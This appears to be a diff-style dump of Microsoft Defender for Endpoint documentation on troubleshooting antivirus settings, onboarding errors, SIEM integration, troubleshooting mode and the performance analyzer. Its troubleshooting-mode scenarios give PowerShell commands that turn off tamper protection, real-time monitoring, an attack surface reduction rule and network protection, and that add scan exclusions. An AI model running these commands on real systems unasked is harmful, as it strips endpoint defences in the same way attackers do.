- wpr.exe -stop merged.etl "Timestamp when the issue was reproduced, in HH:MM:SS format" "Description of the issue" "Any error that popped up"
- ```
-
-7. Wait until the trace is merged.
-
-8. Include both the file and the folder in your submission to Microsoft support.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
->
-
-## See also
--- [Collect Microsoft Defender Antivirus diagnostic data](collect-diagnostic-data.md)-- [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)-- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security Troubleshoot Security Config Mgt https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-security-config-mgt.md
- Title: Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint
-description: Troubleshoot issues that might arise during the onboarding of devices using Security Management for Microsoft Defender for Endpoint.
------- m365-security-- tier3-- Previously updated : 12/14/2023--
-# Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint
--
-**Applies to:**
--- [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)---
-Security Management for Microsoft Defender for Endpoint is a capability for devices that aren't managed by Microsoft Intune to receive security configurations.
-For more information on Security Management for Microsoft Defender for Endpoint, see [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration).
-
-For Security Management for Microsoft Defender for Endpoint onboarding instructions, see [Microsoft Defender for Endpoint Security Configuration Management](security-config-management.md)
--
-For more information about the client analyzer, see [Troubleshoot sensor health using Microsoft Defender for Endpoint Client Analyzer](/microsoft-365/security/defender-endpoint/overview-client-analyzer).
-
-<a name='registering-domain-joined-computers-with-azure-active-directory'></a>
---
-## Run Microsoft Defender for Endpoint Client Analyzer on Windows
-
-Consider running the Client Analyzer on endpoints that are failing to complete the Security Management for Microsoft Defender for Endpoint onboarding flow. For more information about the client analyzer, see [Troubleshoot sensor health using Microsoft Defender for Endpoint Client Analyzer](overview-client-analyzer.md).
-
-The Client Analyzer output file (MDE Client Analyzer Results.htm) can provide key troubleshooting information:
--- Verify that the device OS is in scope for Security Management for Microsoft Defender for Endpoint onboarding flow in **General Device Details** section-- Verify that the device appears in Microsoft Entra ID in **Device Configuration Management Details**-
- :::image type="content" source="media/client-analyzer-results.png" alt-text="The client analyzer results" lightbox="media/client-analyzer-results.png":::
-
-In the **Detailed Results** section of the report, the Client Analyzer also provides actionable guidance.
-
-> [!TIP]
-> Make sure the Detailed Results section of the report does not include any "Errors", and make sure to review all "Warning" messages.
-
-## General troubleshooting
-
-If you weren't able to identify the onboarded device in Microsoft Entra ID or in the Intune admin center, and didn't receive an error during the enrollment, checking the registry key `Computer\\HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\SenseCM\\EnrollmentStatus` can provide additional troubleshooting information.
--
-The following table lists errors and directions on what to try/check in order to address the error. Note that the list of errors isn't complete and is based on typical/common errors encountered by customers in the past:
-
-|Error Code|Enrollment Status|Administrator Actions|
-||||
-|`5-7`, `9`, `11-12`, `26-33`|General error|The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow. This could be due to the device not meeting [prerequisites for Microsoft Defender for Endpoint management channel](security-config-management.md). Running the [Client Analyzer](https://aka.ms/BetaMDEAnalyzer) on the device can help identify the root cause of the issue. If this doesn't help, contact support.|
-| `8`, `44` | Microsoft Intune Configuration issue | The device was successfully onboarded to Microsoft Defender for Endpoint. However, Microsoft Intune hasn't been configured through the Admin Center to allow Microsoft Defender for Endpoint Security Configuration. Make sure the [Microsoft Intune tenant is configured and the feature is turned on](/mem/intune/protect/mde-security-integration#configure-your-tenant-to-support-microsoft-defender-for-endpoint-security-configuration-management).|
-|`13-14`,`20`,`24`,`25`|Connectivity issue|The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow, which could be due to a connectivity issue. Verify that the [Microsoft Entra ID and Microsoft Intune endpoints](security-config-management.md#connectivity-requirements) are opened in your firewall.|
-|`10`,`42`|General Hybrid join failure|The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow and the OS failed to perform hybrid join. Use [Troubleshoot Microsoft Entra hybrid joined devices](/azure/active-directory/devices/troubleshoot-hybrid-join-windows-current) for troubleshooting OS-level hybrid join failures.|
-|`15`|Tenant mismatch|The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow because your Microsoft Defender for Endpoint tenant ID doesn't match your Microsoft Entra tenant ID. Make sure that the Microsoft Entra tenant ID from your Defender for Endpoint tenant matches the tenant ID in the SCP entry of your domain. For more details, [Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint](troubleshoot-security-config-mgt.md).|
-|`16`,`17`|Hybrid error - Service Connection Point|The device was successfully onboarded to Microsoft Defender for Endpoint. However, Service Connection Point (SCP) record isn't configured correctly and the device couldn't be joined to Microsoft Entra ID. This could be due to the SCP being configured to join Enterprise DRS. Make sure the SCP record points to Microsoft Entra ID and SCP is configured following best practices. For more information, see [Configure a service connection point](/azure/active-directory/devices/hybrid-azuread-join-manual#configure-a-service-connection-point).|
-|`18`|Certificate error|The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow due to a device certificate error. The device certificate belongs to a different tenant. Verify that best practices are followed when creating [trusted certificate profiles](/mem/intune/protect/certificates-trusted-root#create-trusted-certificate-profiles).|
-|`36` , `37`| Microsoft Entra Connect misconfiguration |The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow due to a misconfiguration in Microsoft Entra Connect. To identify what is preventing the device from registering to Microsoft Entra ID, consider running the [Device Registration Troubleshooter Tool](/samples/azure-samples/dsregtool/dsregtool). For Windows Server 2012 R2, run the [dedicated troubleshooting instructions](/azure/active-directory/devices/troubleshoot-hybrid-join-windows-legacy). |
-|`38`,`41`|DNS error|The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow due to a DNS error. Check the internet connection and/or DNS settings on the device. The invalid DNS settings might be on the workstation's side. Active Directory requires you to use domain DNS to work properly (and not the router's address). For more information, see [Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint](troubleshoot-security-config-mgt.md).|
-|`40`|Clock sync issue|The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow. Verify that the clock is set correctly and is synced on the device where the error occurs.|
-|`43`|MDE and ConfigMgr|The device is managed using Configuration Manager and Microsoft Defender for Endpoint. Controlling policies through both channels may cause conflicts and undesired results. To avoid this, endpoint security policies should be isolated to a single control plane. |
-
-<a name='azure-active-directory-runtime-troubleshooting'></a>
--
-## Related topic
--- [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)
security Troubleshoot Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-settings.md
- Title: Troubleshoot Microsoft Defender Antivirus settings
-description: Find out where settings for Microsoft Defender Antivirus are coming from.
------ Previously updated : 03/19/2024-----
-# Troubleshoot Microsoft Defender Antivirus settings
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1 and 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-- Microsoft Defender Antivirus-
-Microsoft Defender Antivirus provides numerous ways to manage the product, which provides small and medium-sized businesses and enterprise organizations with flexibility by working with the management tools that they already have.
--- Microsoft Defender for Endpoint security settings management-- Microsoft Intune (MDM)-- Microsoft Configuration Manager with Tenant Attach-- Microsoft Configuration Manager co-management-- Microsoft Configuration Manager (standalone)-- Group Policy (GPO)-- PowerShell-- Windows Management Instrumentation (WMI)-- Registry-
-> [!TIP]
-> For best results, use one method of managing Microsoft Defender Antivirus.
-
-## Troubleshooting Microsoft Defender Antivirus settings
-
-Suppose that migrating from a non-Microsoft antivirus product, and when you try enabling Microsoft Defender Antivirus, it won't start. Most likely, you're experiencing a policy conflict. You can narrow down the issue by checking this registry key: `DisableAntispyware` (dword) 1 (hex) is set.
-
-To remove policy conflicts, here's our current, recommended process:
-
-1. Understand the order of precedence.
-2. Determine where Microsoft Defender Antivirus settings are configured.
-3. Identify policies and settings.
-4. Work with your security team to remove or revise conflicting policies.
-
-## Step 1: Understand the order of precedence
-
-When policies and settings are configured in multiple tools, in general, here's the order of precedence:
-
-1. Microsoft Defender for Endpoint security settings management
-1. Group Policy (GPO)
-1. Microsoft Configuration Manager co-management
-1. Microsoft Configuration Manager (standalone)
-1. Microsoft Intune (MDM)
-1. Microsoft Configuration Manager with Tenant Attach
-1. PowerShell ([Set-MpPreference](/powershell/module/defender/set-mppreference)), [MpCmdRun.exe](command-line-arguments-microsoft-defender-antivirus.md), or [Windows Management Instrumentation](use-wmi-microsoft-defender-antivirus.md) (WMI).
-
-> [!WARNING]
-> [MDMWinsOverGP](/windows/client-management/mdm/policy-csp-controlpolicyconflict) is a Policy CSP setting that does not apply for all settings, such as [attack surface reduction rules](attack-surface-reduction-rules-reference.md) (ASR rules) in Windows 10.
-
-## Step 2: Determine where Microsoft Defender Antivirus settings are configured
-
-Find out whether Microsoft Defender Antivirus settings are coming through a policy, MDM, or a local setting. The following table describes policies, settings, and relevant tools.
-
-|Policy or setting| Registry location | Tools|
-| -- | -- | -- |
-|Policy| `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender`|- Microsoft Defender for Endpoint security settings management<br/>- Microsoft Configuration Manager co-management<br/>- Microsoft Configuration Manager<br/>- GPO|
-|MDM|`HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager` |- Microsoft Intune (MDM)<br/>- Microsoft Configuration Manager with Tenant Attach|
-|Local setting|`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender`|- MpCmdRun.exe<br/>- PowerShell (Set-MpPreference)<br/>- Windows Management Instrumentation (WMI)|
-
-## Step 3: Identify policies or settings
-
-The following table describes how to identify policies and settings.
-
-|Method used | What to check |
-| -- | -- |
-|Policy| - If you're using GPO: Select **Start**, open Command Prompt as an administrator, and then run the command `GpResult.exe /h C:\temp\GpResult_output.html`. <br/>- If you're using Microsoft Configuration Manager co-management or Microsoft Configuration Manager (standalone), go to `C:\Windows\CCM\Logs`.|
-|MDM | If you're using Intune, on your device, select Start, open Command Prompt as an administrator, and then run the command `mdmdiagnosticstool.exe -zip "c:\temp\MDMDiagReport.zip"`. For more details, see [Collect MDM logs - Windows Client Management](/windows/client-management/mdm-collect-logs). |
-|Local setting | Determine whether the policy or setting was deployed during the imaging (sysprep), via PowerShell (for example, Set-MpPreference), Windows Management Instrumentation (WMI), or through a direct modification to the registry.|
-
-## Step 4: Remove or revise conflicting policies
-
-Once you have identified the conflicting policy, work with your security administrators to change device targeting so that devices receive the correct Microsoft Defender Antivirus settings.
security Troubleshoot Siem https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-siem.md
- Title: Troubleshoot SIEM tool integration issues in Microsoft Defender for Endpoint
-description: Troubleshoot issues that might arise when using SIEM tools with Microsoft Defender for Endpoint.
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Troubleshoot SIEM tool integration issues
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-> [!NOTE]
-> The new Microsoft Defender XDR alerts API, released to public preview in MS Graph, is the official and recommended API for customers migrating from the SIEM API. See [Migrate from the MDE SIEM API to the Microsoft Defender XDR alerts API](configure-siem.md).
-
-You might need to troubleshoot issues while pulling detections in your SIEM tools.
-
-This page provides detailed steps to troubleshoot issues you might encounter.
-
-## Learn how to get a new client secret
-
-If your client secret expires or if you've misplaced the copy provided when you were enabling the SIEM tool application, you'll need to get a new secret.
-
-1. Log in to the [Azure management portal](https://portal.azure.com).
-
-2. Select **Microsoft Entra ID**.
-
-3. Select your tenant.
-
-4. Click **App registrations**. Then in the applications list, select the application.
-
-5. Select **Certificates & Secrets** section, Click on New Client Secret, then provide a description and specify the validity duration.
-
-6. Click **Save**. The key value is displayed.
-
-7. Copy the value and save it in a safe place.
-
-## Error when getting a refresh access token
-
-If you encounter an error when trying to get a refresh token when using the threat intelligence API or SIEM tools, you'll need to add reply URL for relevant application in Microsoft Entra ID.
-
-1. Log in to the [Azure management portal](https://ms.portal.azure.com).
-
-2. Select **Microsoft Entra ID**.
-
-3. Select your tenant.
-
-4. Click **App Registrations**. Then in the applications list, select the application.
-
-5. Add the following URL:
- - For the European Union: `https://winatpmanagement-eu.securitycenter.windows.com/UserAuthenticationCallback`
- - For the United Kingdom: `https://winatpmanagement-uk.securitycenter.windows.com/UserAuthenticationCallback`
- - For the United States: `https://winatpmanagement-us.securitycenter.windows.com/UserAuthenticationCallback`.
-
-6. Click **Save**.
-
-## Error while enabling the SIEM connector application
-
-If you encounter an error when trying to enable the SIEM connector application, check the pop-up blocker settings of your browser. It might be blocking the new window being opened when you enable the capability.
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-troubleshootsiem-belowfoldlink)
-
-## Related topics
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Pull detections to your SIEM tools](configure-siem.md)
security Troubleshooting Mode Scenarios https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshooting-mode-scenarios.md
- Title: Troubleshooting mode scenarios in Microsoft Defender for Endpoint
-description: Use the Microsoft Defender for Endpoint troubleshooting mode to address various antivirus issues.
-------- m365-security-- tier3-- mde-ngp-- Previously updated : 10/26/2023--
-# Troubleshooting mode scenarios in Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-configureendpointsscript-abovefoldlink)
-
-Microsoft Defender for Endpoint troubleshooting mode allows you to troubleshoot various Microsoft Defender Antivirus features by enabling them from the device and testing different scenarios, even if they're controlled by the organization policy. The troubleshooting mode is disabled by default and requires you to turn it on for a device (and/or group of devices) for a limited time. This is exclusively an enterprise-only feature, and requires Microsoft Defender XDR access.
-
-For troubleshooting performance-specific issues related to Microsoft Defender Antivirus, see: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
-
-> [!TIP]
-> - During troubleshooting mode, you can use the PowerShell command `Set-MPPreference -DisableTamperProtection $true` on Windows devices.
-> - To check the state of [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md), you can use the [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) PowerShell cmdlet. In the list of results, look for `IsTamperProtected` or `RealTimeProtectionEnabled`. (A value of *true* means tamper protection is enabled.)
--
-## Scenario 1: Unable to install application
-
-If you want to install an application but receive an error message that Microsoft Defender Antivirus and tamper protection is on, use the following procedure to troubleshoot the issue.
-
-1. Request the security admin to turn on troubleshooting mode. You get a Windows Security notification once the troubleshooting mode starts.
-
-2. Connect to the device (using Terminal Services for example) with local admin permissions.
-
-3. Start [Process Monitor](troubleshoot-performance-issues.md#capture-process-logs-using-process-monitor) (ProcMon). See the steps described in [Troubleshoot performance issues related to real-time protection](troubleshoot-performance-issues.md).
-
-4. Go to **Windows security** > **Threat & virus protection** > **Manage settings** > **Tamper protection** > **Off**.
-
- Alternately, during troubleshooting mode, you can use the PowerShell command `Set-MPPreference -DisableTamperProtection $true` on Windows devices.
-
- To check the state of [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md), you can use the [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) PowerShell cmdlet. In the list of results, look for `IsTamperProtected` or `RealTimeProtectionEnabled`. (A value of *true* means tamper protection is enabled.)
-
-5. Launch an elevated PowerShell command prompt, and toggle off [real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md).
-
- - Run `Get-MpComputerStatus` to check the status of real-time protection.
- - Run `Set-MpPreference -DisableRealtimeMonitoring $true` to turn off real-time protection.
- - Run `Get-MpComputerStatus` again to verify status.
-
-6. Try installing the application.
-
-## Scenario 2: High CPU usage due to Windows Defender (MsMpEng.exe)
-
-Sometimes during a scheduled scan, MsMpEng.exe can consume high CPU.
-
-1. Go to **Task Manager** > **Details** tab to confirm that `MsMpEng.exe` is the reason behind the high CPU usage. Also check to see if a scheduled scan is currently underway.
-
-2. Run [Process Monitor](troubleshoot-performance-issues.md#capture-process-logs-using-process-monitor) (ProcMon) during the CPU spike for around five minutes, and then review the ProcMon log for clues.
-
-3. When the root cause is determined, turn on troubleshooting mode.
-
-4. Sign into the device, and launch an elevated PowerShell command prompt.
-
-5. Add process/file/folder/extension exclusions based on ProcMon findings using one of the following commands (the path, extension, and process exclusions mentioned in this article are examples only):
-
- `Set-mppreference -ExclusionPath` (for example, `C:\DB\DataFiles`)
- `Set-mppreference ΓÇôExclusionExtension` (for example, `.dbx`)
- `Set-mppreference ΓÇôExclusionProcess` (for example, `C:\DB\Bin\Convertdb.exe`)
-
-6. After adding the exclusion, check to see if the CPU usage has dropped.
-
-For more information on `Set-MpPreference` cmdlet configuration preferences for Microsoft Defender Antivirus scans and updates, see [Set-MpPreference](/powershell/module/defender/set-mppreference).
-
-## Scenario 3: Application taking longer to perform an action
-
-When Microsoft Defender Antivirus [real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md) is turned on, applications can take longer to perform basic tasks. To turn off real-time protection and troubleshoot the issue, use the following procedure.
-
-1. Request security admin to turn on troubleshooting mode on the device.
-
-2. To disable real-time protection for this scenario, first turn off [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md). You can use the PowerShell command `Set-MPPreference -DisableTamperProtection $true` on Windows devices.
-
- To check the state of tamper protection, you can use the [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) PowerShell cmdlet. In the list of results, look for `IsTamperProtected` or `RealTimeProtectionEnabled`. (A value of *true* means tamper protection is enabled.)
-
- For more information, see [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md).
-
-3. Once tamper protection is disabled, sign into the device.
-
-4. Launch an elevated PowerShell command prompt, and run the following command:
-
- `Set-mppreference -DisableRealtimeMonitoring $true`
-
-5. After disabling [real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md), check to see if the application is slow.
-
-## Scenario 4: Microsoft Office plugin blocked by Attack Surface Reduction
-
-Attack surface reduction isn't allowing Microsoft Office plugin to work properly because **Block all Office applications from creating child processes** is set to block mode.
-
-1. Turn on troubleshooting mode, and sign into the device.
-
-2. Launch an elevated PowerShell command prompt, and run the following command:
-
- `Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Disabled`
-
-3. After disabling the ASR Rule, confirm that the Microsoft Office plugin now works.
-
-For more information, see [Overview of attack surface reduction](overview-attack-surface-reduction.md).
-
-## Scenario 5: Domain blocked by Network Protection
-
-Network Protection is blocking Microsoft domain, preventing users from accessing it.
-
-1. Turn on troubleshooting mode, and sign into the device.
-
-2. Launch an elevated PowerShell command prompt, and run the following command:
-
- `Set-MpPreference -EnableNetworkProtection Disabled`
-
-3. After disabling Network Protection, check to see if the domain is now allowed.
-
-For more information, see [Use network protection to help prevent connections to bad sites](network-protection.md).
--
-## See also
--- [Enable troubleshooting mode](enable-troubleshooting-mode.md)-- [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)-- [Set-MpPreference](/powershell/module/defender/set-mppreference)-- [Get an overview of Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/)-
security Tune Performance Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tune-performance-defender-antivirus.md
- Title: Performance analyzer for Microsoft Defender Antivirus
-description: Describes the procedure to tune the performance of Microsoft Defender Antivirus.
--- Previously updated : 02/16/2024---- m365-security-- mde-ngp----
-# Performance analyzer for Microsoft Defender Antivirus
-
-**Applies to**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-## Requirements
-
-Microsoft Defender Antivirus performance analyzer has the following prerequisites:
--- Supported Windows versions: Windows 10, Windows 11, Windows 2012 R2 with the Modern Unified Solution and Windows Server 2016 and above-- Platform Version: `4.18.2108.7` or later-- PowerShell Version: PowerShell Version 5.1, PowerShell ISE, remote PowerShell (4.18.2201.10+), PowerShell 7.x (4.18.2201.10+)-
-## What is Microsoft Defender Antivirus performance analyzer?
-
- If computers running Microsoft Defender Antivirus are experiencing performance issues, you can use performance analyzer to improve the performance of Microsoft Defender Antivirus. Performance analyzer for Microsoft Defender Antivirus in Windows 10, Windows 11, and Windows Server, is a PowerShell command-line tool that helps you determine files, file extensions, and processes that might be causing performance issues on individual endpoints during antivirus scans. You can use the information gathered by performance analyzer to assess performance issues and apply remediation actions.
-
-Similar to the way mechanics perform diagnostics and service on a vehicle that has performance problems, performance analyzer can help you improve Defender Antivirus performance.
--
-Some options to analyze include:
--- Top paths that impact scan time-- Top files that impact scan time-- Top processes that impact scan time-- Top file extensions that impact scan time-- Combinations ΓÇô for example:
- - top files per extension
- - top paths per extension
- - top processes per path
- - top scans per file
- - top scans per file per process
-
-## Running performance analyzer
-
-The high-level process for running performance analyzer involves the following steps:
-
-1. Run performance analyzer to collect a performance recording of Microsoft Defender Antivirus events on the endpoint.
-
- > [!NOTE]
- > Performance of Microsoft Defender Antivirus events of the type **Microsoft-Antimalware-Engine** are recorded through the performance analyzer.
-
-2. Analyze the scan results using different recording reports.
-
-## Using performance analyzer
-
-To start recording system events, open PowerShell in administrative mode and perform the following steps:
-
-1. Run the following command to start the recording:
-
- ```powershell
- New-MpPerformanceRecording -RecordTo <recording.etl>
- ```
-
- where `-RecordTo` parameter specifies full path location in which the trace file is saved. For more cmdlet information, see [Microsoft Defender Antivirus cmdlets](/powershell/module/defender).
-
-2. If there are processes or services thought to be affecting performance, reproduce the situation by carrying out the relevant tasks.
-
-3. Press **ENTER** to stop and save recording, or **Ctrl+C** to cancel recording.
-
-4. Analyze the results using the performance analyzer's `Get-MpPerformanceReport` parameter. For example, on executing the command `Get-MpPerformanceReport -Path <recording.etl> -TopFiles 3 -TopScansPerFile 10`, the user is provided with a list of top-ten scans for the top three files affecting performance.
-
-For more information on command-line parameters and options, see the [New-MpPerformanceRecording](#new-mpperformancerecording) and [Get-MpPerformanceReport](#get-mpperformancereport).
-
-> [!NOTE]
-> When running a recording, if you get the error "Cannot start performance recording because Windows Performance Recorder is already recording", run the following command to stop the existing trace with the new command:
-> **wpr -cancel -instancename MSFT_MpPerformanceRecording**
-
-## Performance tuning data and information
-
-Based on the query, the user is able to view data for scan counts, duration (total/min/average/max/median), path, process, and **reason for scan**. The following image shows sample output for a simple query of the top 10 files for scan impact.
--
-## Additional functionality: exporting and converting to CSV and JSON
-
-The results of the performance analyzer can also be exported and converted to a CSV or JSON file.
-For examples that describe the process of "export" and "convert" through sample codes, see the following sections.
-
-Starting with Defender version `4.18.2206.X`, users are able to view scan skip reason information under "SkipReason" column. The possible values are:
--- Not Skipped-- Optimization (typically due to performance reasons)-- User skipped (typically due to user-set exclusions)-
-### For CSV
--- **To export**:-
-```powershell
-(Get-MpPerformanceReport -Path .\Repro-Install.etl -Topscans 1000).TopScans | Export-CSV -Path .\Repro-Install-Scans.csv -Encoding UTF8 -NoTypeInformation
-```
--- **To convert**:
-```powershell
-(Get-MpPerformanceReport -Path .\Repro-Install.etl -Topscans 100).TopScans | ConvertTo-Csv -NoTypeInformation
-```
-
-### For JSON
--- **To convert**:
-```powershell
-(Get-MpPerformanceReport -Path .\Repro-Install.etl -Topscans 1000).TopScans | ConvertTo-Json -Depth 1
-```
-
-To ensure machine-readable output for exporting with other data processing systems, it's recommended to use `-Raw` parameter for `Get-MpPerformanceReport`. See the following sections for more details.
--
-## PowerShell reference
-
-There are two new PowerShell cmdlets used to tune performance of Microsoft Defender Antivirus:
--- [New-MpPerformanceRecording](#new-mpperformancerecording)-- [Get-MpPerformanceReport](#get-mpperformancereport)-
-### New-MpPerformanceRecording
-
-The following section describes the reference for the new PowerShell cmdlet New-MpPerformanceRecording. This cmdlet Collects a performance recording of Microsoft Defender Antivirus scans.
-
-#### Syntax: New-MpPerformanceRecording
-
-```powershell
-New-MpPerformanceRecording -RecordTo <String>
-```
-
-#### Description: New-MpPerformanceRecording
-
-The `New-MpPerformanceRecording` cmdlet collects a performance recording of Microsoft Defender Antivirus scans. These performance recordings contain Microsoft-Antimalware-Engine and NT kernel process events and can be analyzed after collection using the [Get-MpPerformanceReport](#get-mpperformancereport) cmdlet.
-
-This `New-MpPerformanceRecording` cmdlet provides an insight into problematic files that could cause a degradation in the performance of Microsoft Defender Antivirus. This tool is provided "AS IS", and isn't intended to provide suggestions on exclusions. Exclusions can reduce the level of protection on your endpoints. Exclusions, if any, should be defined with caution.
-
-For more information on the performance analyzer, see [Performance Analyzer](/windows-hardware/test/wpt/windows-performance-analyzer) docs.
-
-> [!IMPORTANT]
-> This cmdlet requires elevated administrator privileges.
--
-#### Examples: New-MpPerformanceRecording
-
-##### Example 1: Collect a performance recording and save it
-
-```powershell
-New-MpPerformanceRecording -RecordTo .\Defender-scans.etl
-```
-
-The above command collects a performance recording and saves it to the specified path: **.\Defender-scans.etl**.
-
-##### Example 2: Collect a performance recording for remote PowerShell session
-
-```powershell
-$s = New-PSSession -ComputerName Server02 -Credential Domain01\User01
-New-MpPerformanceRecording -RecordTo C:\LocalPathOnServer02\trace.etl -Session $s
-```
-
-The above command collects a performance recording on Server02 (as specified by argument $s of parameter Session) and saves it to the specified path: **C:\LocalPathOnServer02\trace.etl** on Server02.
--
-#### Parameters: New-MpPerformanceRecording
-
-##### -RecordTo
-
-Specifies the location in which to save the Microsoft Defender Antimalware performance recording.
-
-```yaml
-Type: String
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -Session
-
-Specifies the PSSession object in which to create and save the Microsoft Defender Antivirus performance recording. When you use this parameter the RecordTo parameter refers to the local path on the remote machine. Available with Defender platform version 4.18.2201.10.
-
-```yaml
-Type: PSSession[]
-Position: 0
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-### Get-MpPerformanceReport
-
-The following section describes the Get-MpPerformanceReport PowerShell cmdlet. Analyzes and reports on Microsoft Defender Antivirus performance recording.
-
-#### Syntax: Get-MpPerformanceReport
-
